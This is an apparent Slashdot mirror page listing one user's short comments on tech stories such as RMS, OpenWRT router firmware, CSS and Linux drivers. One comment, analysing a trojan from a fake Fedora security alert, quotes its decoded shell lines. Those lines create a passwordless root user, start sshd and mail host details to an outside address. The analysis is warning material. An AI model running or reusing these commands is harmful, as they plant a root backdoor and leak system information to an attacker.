Slashdot Mirror


User: MbM

MbM's activity in the archive.

Stories
0
Comments
93
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 93

  1. Re:Every time he speaks I just want to shoot him on Richard Stallman Warns About Non-Free Web Apps · · Score: 3, Interesting

    Take it with a grain of salt.

    RMS intentionally confuses the terms free and open, because in his mind it isn't free until it's open; to him, free means freedom. The classic example is always "free" as in "free beer" vs "free" as in "free speech"; same word, different meaning.

  2. Re:They could have done better on Google's Obfuscated TCP · · Score: 1

    Interesting; it also has the advantage that with the port number included in the CNAME you could actually run multiple https servers -- something you can't do with port 443 since the cert is sent to the client before the hostname is established.

  3. Re:Theory on How To Build a Quantum Eavesdropper · · Score: 1

    It's easier to argue the corollary -

    It's theoretically possible to produce a machine that implements perfect quantum security. The exploit above does not disprove the theory, only the implementation.

    Oh, you want to know why the implementation was flawed?

  4. Re:Try understanding the issue. on Linus Denounces NDISWrapper, Denies It GPL Status · · Score: 2, Informative

    Well, I for one think it is a great idea since the most popular card manufacturers could not be bothered for the longest time to make linux drivers (and a lot still don't.) Somewhat a flawed argument, since now that ndiswrapper exists there is no incentive to write a linux driver. I would have preferred ndiswrapper didn't exist, allowing linux developers to push for open drivers and specificiations.
  5. Re:You know what works almost as well as Cable? OT on New HD TiVo and Cable Incompatibilities · · Score: 2, Interesting

    Agreed. All you need to recieve over the air HD is a UHF antenna and a digital tuner.

    I bought a device called an HDHomerun just for this purpose. It's an inexpensive dual tuner reciever for unencrypted digital content; streams content over ethernet to any computers on the lan. Now my only concern is harddrive space; storing the shows in their original quality can take 6G per hour -- not that I'm complaining, it's noticably better than the pixelated crap my (analog) tivo produces.

  6. Re:attack easly detected on Chip-and-Pin Vulnerable To Subtle Trickery · · Score: 1

    New hack -
    Canceling out legitimate purchases with phony receipts showing simultaneous transactions.

  7. Re:And if you use those codecs with MPlayer on Lin on Viral Videos That Really Are Viral · · Score: 1

    I think you missed the point of the article. You attempt to play a file in your favorite media player and the following message pops up:

    "Could not find codec for proprietary-spyware-codec; would you like to install the spyware from the website?"

    (Obviously not worded so blatently)

  8. Re:wardrobe malfunction? on How Animatronic Clothes Work · · Score: 2, Funny

    In the future, clothing will be subject to EULA agreements; guess what happens when you license expires?

  9. Re:More tips to prevent explosion! on Sony Announces Global Battery Recall · · Score: 1

    Warming it up in the microwave is still safe, right?

  10. Re:Systematic error in the speed on Tracking Your Cell Phone for Traffic Reports · · Score: 1

    Maybe they should report the cellphones currently in use as potential accident zones.

  11. Re:Real Communism on $5 Social Wi-Fi Router · · Score: 2, Informative

    There's a small heartbeat program that basically calls home confirming that you're still running the firmware.

  12. Mixed units? on Ask Håkon About CSS or...? · · Score: 1
    Why do we have to specify everything in a single unit?

    In other words, why can't I do the following: (without having to resort to messing with padding and margin hacks)
    element { height: 100% - 5em; }
  13. Re:IBM Thinkpads are the same way on BIOS-Approved PCI Cards For Laptops · · Score: 1

    It can be bypassed rather easily on the thinkpads

    see - http://www.uwsg.iu.edu/hypermail/linux/kernel/0406 .1/1048.html

  14. Re:Looks to be a Klik client? on Beware 'Fedora-Redhat' Fake Security Alert · · Score: 2, Insightful

    The klik source is not a trojan, it's simply a glorified wget wrapper .. no idea why

    It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.

  15. Re: I'll try it... Execution results! on Beware 'Fedora-Redhat' Fake Security Alert · · Score: 5, Informative

    The script is encoded into the text variable in the source. The key part of the script is this:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    (I'd post the whole script but the lameness filter won't let me)

    Create a user named bash, no password
    grab the ip and uptime, start ssh
    mail the results

  16. All proceeds go to defending SCO... on SCO Linux Licenses Could Increase In Price · · Score: 4, Insightful

    Don't buy a license, don't support SCO and most importantly don't give them any money to defend this business practice in court; it's cheaper and it helps out in the long run.

  17. Re:Old News Indeed on How Much Are You Paying For Electronics Labels? · · Score: 5, Informative
    Adding this to the userContent.css in mozilla or firefox should clean up most of it:
    td[bgcolor="#A69D78"] { background-color: #006666; }
    td[bgcolor="#EBEBE1"] { background-color: #CCCCCC; }

    td[background="//images.slashdot.org/slashcor ner-it.gif"],
    td[background="//images.slashdot.or g/slashbar-it.gif"] {
    background-image: url(//images.slashdot.org/slashbar.gif);
    }

    bod y[link="#A69D78"] a:link,
    font[color="#A69D78"] { color: #006666; }
    (note, due to slashdot lameness you may need to remove extra spaces)
  18. Re:MOVE OVER MAFIA! on Operation Fastlink Cracks Down on Warez · · Score: 3, Funny

    Yes... 14 year old uber-geeks cracking games and software in mom's basement... yes, that something deserving the title "synicate".

    Nice to see the government(s) spending money going after such terrifying villians instead of your friendly neighbourhood rapists, child molestors and murderers, eh?


    Maybe they should introduce the groups and solve both problems.

  19. Re:how about mesh routing? on Creating A Super-Router (For Free) · · Score: 3, Informative
    I think somebody needs to organize a development community around this. Creating a good stable version of Linux that can be easily installed onto the router. Of course this would require some sort of installer program, that could fetch updates & upgrade the firmware more easily too.
    We're trying to address some of these issues with openwrt. Openwrt provides a minimal firmware image with support for add-on packages via a writable filesystem; essentially a linux distro. The idea is two fold, it allows developers to focus on specific pieces rather than an entire firmware and end users to free up precious resources and customize the firmware by adding or removing features.

    Mesh routing is on the list of things to do with some progress being made in that direction already.
  20. Re:Linksys WRT54G runs on Linux on Hacking Samsung 4510-Based APs · · Score: 1

    Most of the wrt54g hacking is documented on the seattlewireless wiki

  21. Re:More constrained by memory on Linux Distro For Linksys WRT54G · · Score: 4, Informative

    I tried an nfs mounted swapfile with only minimal success. It'd get further but it would go into some heavy swapping flooding the network, durring which time the access point was very unresponsive; just not practical for actual use.

  22. Re:More constrained by memory on Linux Distro For Linksys WRT54G · · Score: 1

    Too true; I attempted to run debian's mipsel port but lacked the memory to even run 'apt-get' without triggering the OOM killer.

  23. One bug I'm still waiting to be fixed ... on Linux 2.6.0-test3 Released · · Score: 1

    Whenever I run this on my laptop it always changes the screen size by turning off the video scaling; it's annoying that I have to reset this each bootup. Does anyone else run into this issue?

    (dell laptop, nvidia card)

  24. Re:AIRO driver still sucks on Linux 2.6.0-test3 Released · · Score: 1

    I ran into the same issue
    http://bugzilla.kernel.org/show_bug.cgi?id= 1011

  25. Re:Before all the flamers get in. on Qt On DirectFB · · Score: 4, Insightful

    When you do run a QT or GTK app over remote connection, the remote (server) library renders the widgets to x primitives which are then sent over to the local (client) computer to display.

    Why is it that (to my knowedge) nobody has done this at a higher level? If the client already has a QT library why not simply send over a 'draw widget' command to that library, creating a proxy out of the server's library.